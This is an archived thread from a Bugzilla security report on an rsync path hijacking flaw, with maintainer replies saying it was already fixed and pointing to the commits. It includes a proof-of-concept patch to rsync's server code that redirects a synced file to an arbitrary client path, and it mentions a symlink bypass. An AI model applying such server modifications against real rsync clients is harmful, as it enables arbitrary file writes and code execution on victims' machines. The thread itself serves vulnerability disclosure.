samba-bugs at samba.org
2014-Nov-14 06:51 UTC
[Bug 10936] New: Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936
Bug ID: 10936
Summary: Rsync path hijacking attack vulnerability
Product: rsync
Version: 3.1.1
Hardware: All
OS: All
Status: NEW
Severity: critical
Priority: P5
Component: core
Assignee: wayned at samba.org
Reporter: gaojianfeng at baidu.com
QA Contact: rsync-qa at samba.org
Created attachment 10433
--> https://bugzilla.samba.org/attachment.cgi?id=10433&action=edit
Rsync path hijacking attack vulnerability.pdf (Detailed documentation)
Hi all:
In newest version rsync,Baidu Security Team found a vulnerability which is
similar to wget ftp CVE-2014-4877
(http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4877).When a
clientuses parameter -a to synchronize files of the server-side(default), for
example:
rsync -avzP 127.0.0.1::share /tmp/share
Rsync recursive synchronous all files,An attacker can hijack the file path by
modifying the code of the server-side,allows remote servers to write to
arbitrary files, and consequently execute arbitrary code .
Vulnerability Details :
First I shared in the Rsync folder to write the following documents
[root at pentest rsync]# ls -lh
total 8.0K
-rw-r--r-- 1 root root 2 Oct 31 03:16 1.txt
drwxr-xr-x 2 root root 4.0K Oct 31 05:17 truedir
[root at pentest rsync]# cd truedir/
[root at pentest truedir]# ls
pwned
[root at pentest truedir]# cat pwned
rsync test
[root at pentest truedir]#
Next I modify the server to send the file code,in the process of
synchronizing,the path of file
"pwned" can be blocked and changed into any path .
file: flist.c line:394
static void send_file_entry(int f, const char *fname, struct file_struct *file,
#ifdef SUPPORT_LINKS
const char *symlink_name, int symlink_len,
#endif
int ndx, int first_ndx)
{
if(strcmp(fname,"turedir/pwned") == 0){
fname="/root/pwned.test"; //Arbitrarily path
}
Then, verification occurs in the server-side and says ?received request to
transfer non-regular file
/root/pwned.test 7 [sender]?,But as an attacker, the code of the server-side
can be arbitrarily
controlled,Shielding the following code.
file:rsync.c line:405?
/*
if (iflags & ITEM_TRANSFER) {
int i = ndx - cur_flist->ndx_start;
if (i < 0 || !S_ISREG(cur_flist->files[i]->mode)) {
rprintf(FERROR,
"received request to transfer non-regular file: %d
[%s]\n",
ndx, who_am_i());
exit_cleanup(RERR_PROTOCOL);
}
}
*/
The file "pwned" will be downloaded into forged
path(/root/pwned.test).
--
You are receiving this mail because:
You are the QA Contact for the bug.
samba-bugs at samba.org
2014-Nov-14 23:24 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936 --- Comment #1 from roland <devzero at web.de> --- in other words - a malicious rsync server can force a client to create any file in any path, as long as the client can write to that path ? indeed, interesting find - and a security bug then. -- You are receiving this mail because: You are the QA Contact for the bug.
samba-bugs at samba.org
2014-Nov-17 03:01 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936 --- Comment #2 from gaojianfeng <gaojianfeng at baidu.com> --- (In reply to roland from comment #1) yes -- You are receiving this mail because: You are the QA Contact for the bug.
samba-bugs at samba.org
2014-Nov-27 19:29 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936
Wayne Davison <wayned at samba.org> changed:
What |Removed |Added
----------------------------------------------------------------------------
Resolution|--- |FIXED
Status|NEW |RESOLVED
--- Comment #3 from Wayne Davison <wayned at samba.org> ---
In your test, you didn't use 3.1.1 on the client side. This was fixed in
that
release:
ABORTING due to unsafe pathname from sender: /root/pwned.test
--
You are receiving this mail because:
You are the QA Contact for the bug.
samba-bugs at samba.org
2014-Nov-27 20:01 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936 --- Comment #4 from roland <devzero at web.de> --- that fix is this two commits, correct ? https://git.samba.org/?p=rsync.git;a=commit;h=371242e4e8150d4f9cc74cdf2d75d8250535175e https://git.samba.org/?p=rsync.git;a=commit; h=4cad402ea8a91031f86c53961d78bb7f4f174790 -- You are receiving this mail because: You are the QA Contact for the bug.
samba-bugs at samba.org
2014-Nov-27 20:10 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936 --- Comment #5 from Wayne Davison <wayned at samba.org> --- (In reply to roland from comment #4) Yes, those are the commits for this bug. -- You are receiving this mail because: You are the QA Contact for the bug.
samba-bugs at samba.org
2014-Dec-01 07:16 UTC
[Bug 10936] Rsync path hijacking attack vulnerability
https://bugzilla.samba.org/show_bug.cgi?id=10936 --- Comment #6 from gaojianfeng <gaojianfeng at baidu.com> --- (In reply to Wayne Davison from comment #3) yes ! In newest version rsync(3.1.1),directly modify the file path into absolute path is not hijack succeed due to the security checks,but using symbolic links still can bypass security checks and spoofing client. A new bug I submitted :https://bugzilla.samba.org/show_bug.cgi?id=10977 -- You are receiving this mail because: You are the QA Contact for the bug.
Apparently Analagous Threads
- [Bug 10977] New: Rsync path spoofing attack vulnerability (rsync 3.1.1 tested)
- [PATCH] Unsnarl missing_below/dry_run logic.
- [patch] Replace illegal characters in filenames for FAT (switch)
- about .dovecot.sieve file can't found for directory
- about rsyncing of block devices